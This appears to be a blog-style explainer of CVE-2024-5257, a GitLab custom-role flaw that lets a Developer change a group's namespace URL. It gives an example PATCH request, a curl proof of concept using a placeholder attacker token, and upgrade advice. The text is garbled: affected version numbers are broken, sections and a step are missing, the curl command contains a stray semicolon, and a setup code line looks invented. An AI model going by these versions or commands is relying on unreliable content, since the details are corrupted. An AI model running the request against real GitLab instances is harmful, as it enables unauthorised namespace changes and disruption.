CVE-2024-5257 - Exploiting Group Namespace URL Change in GitLab Custom Roles (Explained Simply)

In June 2024, a security issue was discovered in GitLab CE/EE, affecting all versions starting from 17. up to (but not including) 17..4, and from 17.1 up to (but not including) 17.1.2. The vulnerability is tracked as CVE-2024-5257.

This flaw allows a Developer user in a group (who has been given the admin_compliance_framework custom role) to change the group namespace URL. Traditionally, such an action is privileged and limited to Owners. When a group namespace URL is modified unexpectedly, it can break internal links and create a window for phishing, misdirection, or data loss.

The Details: Why is It a Problem?

GitLab group namespaces are the unique paths under which projects, repositories, and users are organized, e.g., gitlab.com/my-company. Changing one can:

- Break external/internal references

Any GitLab instance using vulnerable versions.

- Groups where the Developer role is granted custom permissions (especially admin_compliance_framework).

1. Setup: Custom Role Assignment

# Admin assigns custom role with 'admin_compliance_framework'
group.developer.add_custom_role('admin_compliance_framework')

With the improper permissions, the Developer makes a PATCH request

PATCH /groups/my-company
Content-Type: application/json

{
  "path": "my-company-hacked"
}

3. Effect

- All group references are now under gitlab.com/my-company-hacked
- Pipelines and CI/CD jobs using my-company namespace break

Proof-of-Concept: Simulating the Attack

Below is a script using curl to exploit the issue via the GitLab API (assume attacker has a user token):

curl --request PATCH "https://gitlab.example.com/api/v4/groups/GROUP_ID"; \
     --header "PRIVATE-TOKEN: ATTACKER_PERSONAL_ACCESS_TOKEN" \
     --form "path=my-company-hacked"

This should NOT be possible for a Developer, but due to this vulnerability, it works if they have the custom compliance role.

Review Role Assignments:

Make sure the admin_compliance_framework permission isn’t assigned to users unless absolutely necessary, and audit current custom roles.

References & Further Reading

- GitLab Security Release Blog – 17..4, 17.1.2
- CVE-2024-5257 NVD Entry
- GitLab Documentation: Custom Roles

In Summary

CVE-2024-5257 is a clear example of how powerful custom roles, if not tightly scoped, can introduce security gaps. In this case, a "Developer" with an elevated compliance role could act like an Owner and change a group's URL — a critical action. If you run GitLab, double-check your version and user roles today. This one-liner can save a lot of pain:

> Upgrade to 17..4 or 17.1.2+ as soon as possible.

Timeline

Published on: 07/11/2024 07:15:04 UTC
Last modified on: 07/12/2024 16:54:34 UTC